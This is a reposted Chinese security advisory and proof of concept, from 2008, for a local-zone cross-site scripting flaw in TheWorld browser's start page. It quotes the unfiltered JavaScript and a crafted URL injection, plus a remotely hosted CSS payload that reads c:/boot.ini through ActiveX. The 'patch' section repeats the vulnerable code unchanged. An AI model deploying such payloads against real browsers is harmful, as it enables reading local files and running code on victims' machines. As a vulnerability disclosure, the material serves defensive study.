世界之窗等瀏覽器本地xss跨域漏洞POC
互聯(lián)網(wǎng) 發(fā)布時(shí)間:2008-10-08 20:02:20 作者:佚名
我要評(píng)論

漏洞說(shuō)明:http://www.80sec.com/360-sec-browser-localzone-xss.html
文檔來(lái)源:http://www.80sec.com/release/The-world-browser-locale-zone-xss-POC.txt
漏洞分析:世界之窗瀏覽器在起始頁(yè)面是以res://E:PROGRA~1THEWOR~1.0languageschs.dll
漏洞說(shuō)明:http://www.80sec.com/360-sec-browser-localzone-xss.html
文檔來(lái)源:http://www.80sec.com/release/The-world-browser-locale-zone-xss-POC.txt
漏洞分析:世界之窗瀏覽器在起始頁(yè)面是以res://E:\PROGRA~1\THEWOR~1.0\languages\chs.dll/TWHOME.HTM的形式來(lái)處理的,而由于缺乏對(duì)res協(xié)議安全的必要控制,導(dǎo)致頁(yè)面的權(quán)限很高,而該頁(yè)面中存在的一個(gè)xss問(wèn)題將導(dǎo)致本地跨域漏洞,簡(jiǎn)單分析如下:
<script language="JavaScript">
var nOldCount = 0;
for( i = 0; i < g_nCountOld; i )
{
str_url = g_arr_argUrlOld[i];
str_name = g_arr_argNameOld[i];
str_td = “<tr ID=’twOldItem” i ”‘><td valign=’top’ width=’64′><div align=’right’><a style=’cursor:hand’ title=’刪除當(dāng)前項(xiàng)’ onclick=\”javascript:tw_DeleteItemOld(’” i ”‘);\”>” “<img border=’0′ src=’twpage_delete.gif’ width=’16′ height=’16′></div></a></td>”;
document.write( str_td );
str_td = “<td><a target=’_blank’ href=’” str_url “‘>” str_name “</a></td></tr>”;
document.write( str_td );
nOldCount = i;
g_bHasLastUrl = true;
}
</script>
str_name和str_url不經(jīng)過(guò)濾地直接輸出,由于該頁(yè)面處于本地安全區(qū)域,所以擁有很高的權(quán)限,可以做很多跨域操作,包括讀取文件和運(yùn)行本地程序。
漏洞修補(bǔ):
<script language="JavaScript">
var nOldCount = 0;
for( i = 0; i < g_nCountOld; i )
{
str_url = g_arr_argUrlOld[i];
str_name = g_arr_argNameOld[i];
str_td = “<tr ID=’twOldItem” i ”‘><td valign=’top’ width=’64′><div align=’right’><a style=’cursor:hand’ title=’刪除當(dāng)前項(xiàng)’ onclick=\”javascript:tw_DeleteItemOld(’” i ”‘);\”>” “<img border=’0′ src=’twpage_delete.gif’ width=’16′ height=’16′></div></a></td>”;
document.write( str_td );
str_td = “<td><a target=’_blank’ href=’” str_url “‘>” str_name “</a></td></tr>”;
document.write( str_td );
nOldCount = i;
g_bHasLastUrl = true;
}
</script>
已經(jīng)用js控制DOM顯示了
漏洞演示:這里提供測(cè)試方法可以讀取c:/boot.ini
1 打開(kāi)如下地址
sc:h’><script>alert(document.write(unescape(””)))</script>
2 上面將導(dǎo)致一個(gè)不可訪問(wèn)的頁(yè)面,然后直接關(guān)閉tw瀏覽器( 沒(méi)有好的辦法crash)
3 重新打開(kāi)tw瀏覽器,可以發(fā)現(xiàn)http://www.80sec.com/1.css中的內(nèi)容被解析,并且有本地域的權(quán)限。
1.css內(nèi)容,換成其他js代碼一樣執(zhí)行
body {
background-image: url('javascript:alert(document.location);xmlhttp=new ActiveXObject("Msxml2.XMLHTTP.3.0");xmlhttp.open("GET","c:/boot.ini",false);xmlhttp.send();alert(xmlhttp.responseText);')
}
漏洞狀態(tài):
2008-06-24通知廠商
2008-06-25修補(bǔ)
http://www.ioage.com/cnnew/uplog.htm
相關(guān)文章
TheWorld 世界之窗瀏覽器 v7.0.0.108 綠色免費(fèi)版 集成flash34.0.0.321
世界之窗瀏覽器,是一款小巧、快速、簡(jiǎn)潔著稱(chēng)的國(guó)產(chǎn)雙核瀏覽器,UI風(fēng)格非常簡(jiǎn)約,無(wú)任何多余東西;具有體積小巧、啟動(dòng)速度快、打開(kāi)網(wǎng)頁(yè)快、資源占用小、使用流暢等特色,在2024-09-19TheWorld 世界之窗瀏覽器 v3.6.1.1 苦菜花優(yōu)化安裝版
世界之窗瀏覽器是一款小巧、快速、安全、功能強(qiáng)大的多窗口瀏覽器,它是完全免費(fèi),沒(méi)有任何功能限制的綠色軟件。2013-03-21世界之窗(極速版) TheWorld Chrome V5.0.342.5 官方安裝版
大家好,轉(zhuǎn)眼間又是一年過(guò)去,現(xiàn)在我們就要過(guò)2010年的春節(jié)了,對(duì)于從第一個(gè)版本就陪伴我們一路走來(lái)的用戶朋友來(lái)說(shuō),已經(jīng)五年過(guò)去了,真是光陰似箭??! 一直以來(lái),工作2010-04-04- 世界之窗綠色增強(qiáng)優(yōu)化版目前所有的多窗口瀏覽器中,只有IE7實(shí)現(xiàn)了多線程多窗口,既每個(gè)窗口是一個(gè)單獨(dú)的線程,這樣的好處是不言而喻的,可以充分利用系統(tǒng)資源,避免某個(gè)子2011-07-04
Chrome瀏覽器的一個(gè)并行分支 世界之窗 TheWorld Chrome 6.2.0.112 綠色
一款多窗口瀏覽器,它采用IE內(nèi)核,具有如下特點(diǎn): 1)極小的資源占用,同時(shí)訪問(wèn)多個(gè)頁(yè)面消耗系統(tǒng)內(nèi)存極小 2)增強(qiáng)的穩(wěn)定性,這對(duì)于多窗口瀏覽器來(lái)說(shuō)尤其顯得重要 3)優(yōu)化的2013-11-08多標(biāo)簽多窗口瀏覽器 世界之窗 TheWorld v4.2.0.102 綠色極速版
世界之窗瀏覽器極速版(也可以叫做TheWorld Chrome版),看起來(lái)像是僅僅在Google Chrome瀏覽器基礎(chǔ)上更換一套默認(rèn)皮膚,預(yù)置幾個(gè)擴(kuò)展。2011-11-02- 問(wèn):我有多個(gè)QQ,在“世界之窗”瀏覽器里進(jìn)行QQ“好友”、“搶車(chē)位”的過(guò)程中,我發(fā)現(xiàn)第一個(gè)QQ沒(méi)問(wèn)題,第二、第三個(gè)后的QQ就仍然無(wú)法進(jìn)行“好友”、“搶車(chē)位”,但我已2009-04-27
世界之窗瀏覽器 2.3 Final (2.3.0.7)綠色增強(qiáng)版_可清除隱藏文字
一些網(wǎng)站或論壇為了防止文章被復(fù)制,加入了隱藏文字保護(hù)機(jī)制,這樣當(dāng)你直接復(fù)制文字時(shí),會(huì)附加出現(xiàn)一大堆隱藏的亂碼,這個(gè)插件就是專(zhuān)門(mén)用來(lái)清除這樣隱藏文字用的。站長(zhǎng)編輯2008-09-20世界之窗瀏覽器(多標(biāo)簽多窗口瀏覽器) v7.0.0.108 中文官方安裝版
世界之窗瀏覽器是一款小巧快速、 安全穩(wěn)定、功能貼心的綠色瀏覽器2017-02-24